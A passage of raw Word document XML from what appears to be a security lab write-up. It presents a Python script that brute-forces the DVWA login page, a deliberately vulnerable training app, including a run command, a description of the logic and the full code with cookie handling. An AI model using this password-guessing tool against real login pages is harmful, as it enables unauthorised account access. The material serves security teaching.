    <w:p w14:paraId="7F3B6F77" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command-Line Arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26301F98" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>The script accepts the following inputs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F38CB55" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>url: The DVWA login page URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD4FCC" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>username: The username to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B2FBC" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>passwdfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>: The path to a file containing a list of potential passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507304FB" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>fail_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>: The message displayed when login fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6792E82C" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>(Optional) cookies: A dictionary of cookies to be sent with each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1DBC5" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="0081598B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58ABEF" w14:textId="05095E80" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="0081598B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>python bruteforce2.py http://10.0.2.5/dvwa/login.php admin passwords.txt "Login failed</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>" "{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>'PHPSESSID': 'abc123', 'security': 'low'}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD92A1" w14:textId="12819F31" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F19C1" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Missing Password File: Exits with an error if the password file is not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9BF746" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Invalid Cookies: Exits with an error if cookies are not provided in the correct format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A2380" w14:textId="77777777" w:rsidR="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7D5B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Network Issues: Handles network errors gracefully and provides a clear error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71694EA8" w14:textId="387C1D76" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Brute Forcing Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB88ED" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Reads passwords line by line from the provided file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC0DCB8" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Sends</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> an HTTP POST request for each password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0329F" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>Checks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> the response for the failure string. If the string is absent, it identifies the correct password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D265C3" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA3F6F4" w14:textId="5187BF7A" w:rsidR="00FB7D5B" w:rsidRPr="00FB7D5B" w:rsidRDefault="00FB7D5B" w:rsidP="00FB7D5B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00805906">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FC981DC" wp14:editId="1144DF16">
            <wp:extent cx="5943600" cy="1990725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="972969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97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3393" w14:textId="77777777" w:rsidR="0081598B" w:rsidRDefault="0081598B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="155743B0" w14:textId="45E70081" w:rsidR="00E01E33" w:rsidRPr="0081598B" w:rsidRDefault="00FB7D5B" w:rsidP="00E01E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part 2</w:t>
      </w:r>
      <w:r w:rsidR="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E01E33" w:rsidRPr="0081598B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adding Cookie Support for DVWA Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431C3A2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>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042ACA37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>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C4178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E01E33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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D772F21" w14:textId="4A9553AE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ast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  #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 xml:space="preserve"> To safely parse cookies as a dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0057D3F8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def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cracking(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E3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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>url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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>passwdfile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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fail_string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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B6F71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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F0B2E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# Open and read the password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387CD6BA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open(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passwdfile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, 'r') as passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28467071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for password in passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315474D8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password =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password.strip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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10135B7D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'Trying: ' + password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D18CD1A" w14:textId="37517229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data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= {'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username': username, 'password': password, 'Login': 'Login'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B814EE9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# Send POST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request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 xml:space="preserve"> with or without cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD3335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if cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27626E1E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    response =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requests.post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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>url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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">=data, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=cookies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06274407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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680C1E8" w14:textId="1B08AFEA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    response =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requests.post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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>url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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149BA04D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# Check the response for the failure string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3161543C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fail_string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response.content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.decode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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE9465A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    continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CF29D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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32345E0F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'Found username ==&gt; ' + username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E092404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'Found password ==&gt; ' + password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB77AA1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exit(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE84FC7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'No match found')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17493E3E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except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FileNotFoundError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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE585CB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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>f"Error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: Password file '{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passwdfile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}' not found.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534AC291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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76171E66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except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requests.exceptions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.RequestException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 as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF61435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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>f"Error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: Failed to connect to the URL.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Details: {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e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FBCEFC" w14:textId="787E2970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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C405258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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA3C7AB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# Check if the correct number of arguments are provided</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282FD2D3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len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 xml:space="preserve">) &lt; 5 or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len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sys.argv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) &gt; 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB7AB1D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"Usage: python bruteforce2.py &lt;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url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&gt; &lt;username&gt; &lt;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password_file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&gt; &lt;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fail_string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&gt; [&lt;cookies&gt;]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E439EB" w14:textId="51CB1F5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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EB8CD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# Extract arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D544E70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url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[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365200D8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username =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[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7365D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passwdfile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[3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED43BB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fail_string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[4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505BFEE0" w14:textId="6CAD5CB9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cookies = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DA8E5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# Parse cookies if provided</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62554B01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len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argv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) == 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B6244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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0465C30B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cookies =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ast.literal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_eval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sys.argv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[5])  # Safely parse cookies as a dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF825AE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except (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SyntaxError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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ValueError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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA7641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 xml:space="preserve">"Error: Cookies must be provided as a valid dictionary string, e.g.,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\"{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'PHPSESSID': 'abc123', 'security': 'low'}\"")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB298C5" w14:textId="4B3FE126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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9B6B59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# Validate the password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E720E80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>.isfile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passwdfile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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A2FDD1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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>f"Error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: Password file '{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passwdfile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}' does not exist.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD715A2" w14:textId="0058018B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E01E33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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65D34C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# Start cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1067F696" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="0081598B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01E33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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cracking(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">username,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url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passwdfile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E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fail_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, cookies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B8226" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278D33D6" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Script Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0A5342" w14:textId="77777777" w:rsidR="00E01E33" w:rsidRPr="00E01E33" w:rsidRDefault="00E01E33" w:rsidP="00E01E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command-Line Arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01E33">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
